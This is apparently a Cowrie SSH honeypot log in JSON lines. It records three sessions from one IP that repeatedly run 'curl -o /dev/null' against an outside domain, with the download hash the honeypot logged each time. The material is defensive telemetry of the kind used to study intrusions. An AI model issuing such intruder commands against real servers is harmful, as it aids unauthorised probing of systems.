{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.088499Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.090956Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.092848Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.093470Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.097051Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.098277Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.099387Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.103600Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.104366Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.131619Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.133450Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.135735Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.137437Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.138093Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.142082Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.143030Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.145627Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.146238Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.177187Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.178223Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.178643Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.181044Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.181493Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.210977Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.211707Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.214841Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.243285Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.244301Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.244968Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.248869Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.251013Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.251403Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.260766Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.283757Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.284870Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.285379Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.288852Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.289778Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.293012Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.294163Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.294714Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.299243Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.301883Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.326805Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.328762Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.331180Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.334022Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.334885Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.340005Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.341054Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.343712Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.344572Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.387345Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.389971Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.391759Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.392677Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.395491Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.396387Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.398545Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.399462Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.436479Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.438578Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.439924Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.440341Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.442469Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.443502Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.445619Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.446352Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.449019Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.478420Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.480321Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.483116Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.485016Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.485845Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.487972Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.488722Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.492836Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.493514Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.523418Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
